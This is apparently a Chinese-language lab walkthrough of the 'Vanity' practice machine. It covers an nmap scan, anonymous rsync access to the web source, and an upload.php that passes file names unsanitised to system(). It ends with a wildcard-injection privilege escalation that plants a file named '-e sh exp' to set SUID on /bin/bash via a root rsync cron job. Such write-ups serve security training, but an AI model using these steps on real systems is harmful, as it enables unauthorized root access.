Vanity Intermediate 统配符提权
nmap扫描
┌──(root㉿kali)-[~]
└─# nmap -p- -A 192.168.167.234
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-09 03:59 UTC
Stats: 0:01:22 elapsed; 0 hosts completed (1 up), 1 undergoing Traceroute
Traceroute Timing: About 32.26% done; ETC: 04:00 (0:00:00 remaining)
Nmap scan report for 192.168.167.234
Host is up (0.072s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA)
| 256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)
|_ 256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Vanity Virus Scanner
|_http-server-header: Apache/2.4.41 (Ubuntu)
873/tcp open rsync (protocol version 31)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=11/9%OT=22%CT=1%CU=43814%PV=Y%DS=4%DC=T%G=Y%TM=672E
OS:DE5A%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=107%TI=Z%II=I%TS=A)OPS(O
OS:1=M551ST11NW7%O2=M551ST11NW7%O3=M551NNT11NW7%O4=M551ST11NW7%O5=M551ST11N
OS:W7%O6=M551ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R
OS:=Y%DF=Y%T=40%W=FAF0%O=M551NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%
OS:RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%
OS:Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK
OS:=9655%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 199/tcp)
HOP RTT ADDRESS
1 69.74 ms 192.168.45.1
2 69.54 ms 192.168.45.254
3 71.50 ms 192.168.251.1
4 71.55 ms 192.168.167.234
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 84.89 seconds
rsync查看源码
┌──(root㉿kali)-[~/lab]
└─# rsync -rdt rsync://192.168.167.234
source Web Source
backup Virus Samples Backup
┌──(root㉿kali)-[~/lab]
└─# rsync -rdt rsync://192.168.167.234/source
drwxr-xr-x 4,096 2022/10/25 11:31:36 .
-rw-r--r-- 2,814 2022/10/25 11:31:36 index.html
-rw-r--r-- 155 2022/10/25 11:31:36 style.css
drwxr-xr-x 4,096 2022/10/25 11:31:36 uploads
-rw-r--r-- 738 2022/10/25 11:31:36 uploads/upload.php
┌──(root㉿kali)-[~/lab]
└─# rsync -rdt rsync://192.168.167.234 ./rsyn_shared
source Web Source
backup Virus Samples Backup
┌──(root㉿kali)-[~/lab]
└─# ls
apache_2fa pass
┌──(root㉿kali)-[~/lab]
└─# rsync -rdt rsync://192.168.167.234/source
drwxr-xr-x 4,096 2022/10/25 11:31:36 .
-rw-r--r-- 2,814 2022/10/25 11:31:36 index.html
-rw-r--r-- 155 2022/10/25 11:31:36 style.css
drwxr-xr-x 4,096 2022/10/25 11:31:36 uploads
-rw-r--r-- 738 2022/10/25 11:31:36 uploads/upload.php
┌──(root㉿kali)-[~/lab]
└─# rsync -rdt rsync://192.168.167.234/source/uploads/upload.php
-rw-r--r-- 738 2022/10/25 11:31:36 upload.php
┌──(root㉿kali)-[~/lab]
└─# rsync -av rsync://192.168.167.234/source/uploads/upload.php ./upload.php
receiving incremental file list
upload.php
sent 43 bytes received 834 bytes 250.57 bytes/sec
total size is 738 speedup is 0.84
┌──(root㉿kali)-[~/lab]
└─# ls
apache_2fa pass upload.php
┌──(root㉿kali)-[~/lab]
└─# cat upload.php
<?php
//Check if the file is well uploaded
if($_FILES['file']['error'] > 0) { echo 'Error during uploading, try again'; }
//Set up valid extension
$extsNotAllowed = array( 'php','php7','php6','phar','phtml','phps','pht','phtm','pgif','shtml','htaccess','inc');
$extUpload = strtolower( substr( strrchr($_FILES['file']['name'], '.') ,1) ) ;
//Check if the uploaded file extension is allowed
if (in_array($extUpload, $extsNotAllowed) ) {
echo 'File not allowed';
}
else {
$name = "{$_FILES['file']['name']}";
$result = move_uploaded_file($_FILES['file']['tmp_name'], $name);
if($result){
system("/usr/bin/clamscan $name");
}
}
?>
pspy32发现会执行rsync命令定时任务,存在通配符提权
利用通配符提权
www-data@vanity:/var/www/html/uploads$ rm *
www-data@vanity:/var/www/html/uploads$ echo "chmod +s /bin/bash" > exp
www-data@vanity:/var/www/html/uploads$ chmod 777 *
www-data@vanity:/var/www/html/uploads$ echo > '-e sh exp'
www-data@vanity:/var/www/html/uploads$ ls